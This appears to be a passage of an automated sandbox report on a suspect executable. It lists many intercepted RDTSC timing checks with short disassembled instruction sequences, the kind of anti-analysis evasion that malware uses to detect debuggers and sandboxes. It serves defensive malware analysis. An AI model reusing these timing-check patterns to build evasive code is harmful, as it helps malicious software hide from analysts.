                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FAA43 second address: 12FAA57 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F8ED0E3C3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007F8ED0E3C3D6h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FFB23 second address: 12FFB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FFB27 second address: 12FFB2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12FFCAC second address: 12FFCB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300771 second address: 1300775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1300E61 second address: 1300E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12679A5 second address: 12679A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12679A9 second address: 12679B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12679B4 second address: 12679BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 12679BA second address: 12679C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130721C second address: 1307222 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309C11 second address: 1309C23 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007F8ED0C920CCh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1309C23 second address: 1309C4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F8ED0E3C3E4h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13098FE second address: 130990A instructions: 0x00000000 rdtsc 0x00000002 js 00007F8ED0C920C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 127BC7A second address: 127BCA6 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F8ED0E3C3D6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnc 00007F8ED0E3C3D8h 0x00000012 push edi 0x00000013 jmp 00007F8ED0E3C3E4h 0x00000018 push esi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EA9A second address: 130EAA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EAA2 second address: 130EAA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EAA8 second address: 130EAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F8ED0C920C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130EAB2 second address: 130EAC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F8ED0E3C3DCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 130E7B9 second address: 130E7BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313353 second address: 131336B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131336B second address: 1313389 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920CAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007F8ED0C920E2h 0x00000011 push eax 0x00000012 push edx 0x00000013 jnl 00007F8ED0C920C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13134A3 second address: 13134CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 popad 0x00000008 jo 00007F8ED0E3C3D6h 0x0000000e popad 0x0000000f jmp 00007F8ED0E3C3E4h 0x00000014 jl 00007F8ED0E3C3DCh 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313659 second address: 131365F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131365F second address: 1313665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313665 second address: 1313675 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jne 00007F8ED0C920DAh 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313956 second address: 131395A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131395A second address: 1313989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D9h 0x00000007 jmp 00007F8ED0C920CBh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1313989 second address: 131398F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131398F second address: 131399B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jbe 00007F8ED0C920C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317F87 second address: 1317F8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317F8D second address: 1317F93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1317F93 second address: 1317F97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131810F second address: 1318113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318113 second address: 131812B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131812B second address: 1318156 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F8ED0C920D7h 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F8ED0C920CAh 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13182A3 second address: 13182A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1318561 second address: 13185BF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F8ED0C920D8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F8ED0C920D7h 0x00000016 jmp 00007F8ED0C920CFh 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131875A second address: 1318775 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0E3C3E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E854 second address: 131E863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F8ED0C920C6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131E9DB second address: 131E9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131EB3E second address: 131EB48 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F8ED0C920E5h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131EE7A second address: 131EE7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 131EE7E second address: 131EE87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320537 second address: 1320542 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320542 second address: 1320546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1320546 second address: 132054C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132054C second address: 1320558 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jbe 00007F8ED0C920C6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1325FF0 second address: 1325FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A322 second address: 132A330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F8ED0C920C6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A330 second address: 132A339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A339 second address: 132A33D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A33D second address: 132A34F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8ED0E3C3D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A34F second address: 132A353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329436 second address: 1329453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F8ED0E3C3E0h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329453 second address: 132946B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F8ED0C920C6h 0x00000008 jl 00007F8ED0C920C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132946B second address: 132946F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132946F second address: 1329473 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329473 second address: 132948C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0E3C3E3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132948C second address: 1329491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329795 second address: 132979E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13298F5 second address: 1329911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0C920D8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329911 second address: 1329915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329915 second address: 1329942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F8ED0C920CCh 0x0000000c jnl 00007F8ED0C920C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 jnp 00007F8ED0C920C6h 0x0000001a jmp 00007F8ED0C920D3h 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329942 second address: 132994B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329C0E second address: 1329C14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329C14 second address: 1329C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329C1B second address: 1329C2B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F8ED0C920CBh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1329ED9 second address: 1329EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 jmp 00007F8ED0E3C3DBh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 132A03C second address: 132A044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13326C3 second address: 13326CD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F8ED0E3C3D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1330EC4 second address: 1330EC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133104A second address: 1331053 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331053 second address: 1331070 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8ED0C920D8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 133132F second address: 1331355 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8ED0E3C3E9h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d pushad 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331DEF second address: 1331E0A instructions: 0x00000000 rdtsc 0x00000002 jo 00007F8ED0C920C6h 0x00000008 jmp 00007F8ED0C920D1h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1331E0A second address: 1331E14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F8ED0E3C3D6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1332547 second address: 1332565 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8ED0C920D9h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1339A2B second address: 1339A38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push edi 0x0000000b pop edi 0x0000000c pop ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1347B2D second address: 1347B39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1347B39 second address: 1347B3F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134A96A second address: 134A96E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134A96E second address: 134A990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0E3C3E8h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134A990 second address: 134A996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134A612 second address: 134A61C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F8ED0E3C3D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134A61C second address: 134A62C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 jo 00007F8ED0C920C6h 0x0000000d push edx 0x0000000e pop edx 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134A62C second address: 134A631 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134CE2F second address: 134CE46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F8ED0C920D1h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134FABE second address: 134FAC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134FAC2 second address: 134FAD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0C920CEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134FAD6 second address: 134FAEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8ED0E3C3E2h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 134FAEC second address: 134FB28 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F8ED0C920D6h 0x00000010 pushad 0x00000011 jmp 00007F8ED0C920D8h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1355442 second address: 1355446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135F31C second address: 135F331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F8ED0C920CFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135F331 second address: 135F338 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135F338 second address: 135F340 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 135F340 second address: 135F344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361853 second address: 1361857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1361857 second address: 1361871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F8ED0E3C3E1h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1368599 second address: 13685BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push edx 0x00000009 jmp 00007F8ED0C920D6h 0x0000000e pop edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13685BE second address: 13685C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1366F27 second address: 1366F51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 js 00007F8ED0C920C6h 0x0000000d jmp 00007F8ED0C920D9h 0x00000012 popad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1366F51 second address: 1366F57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
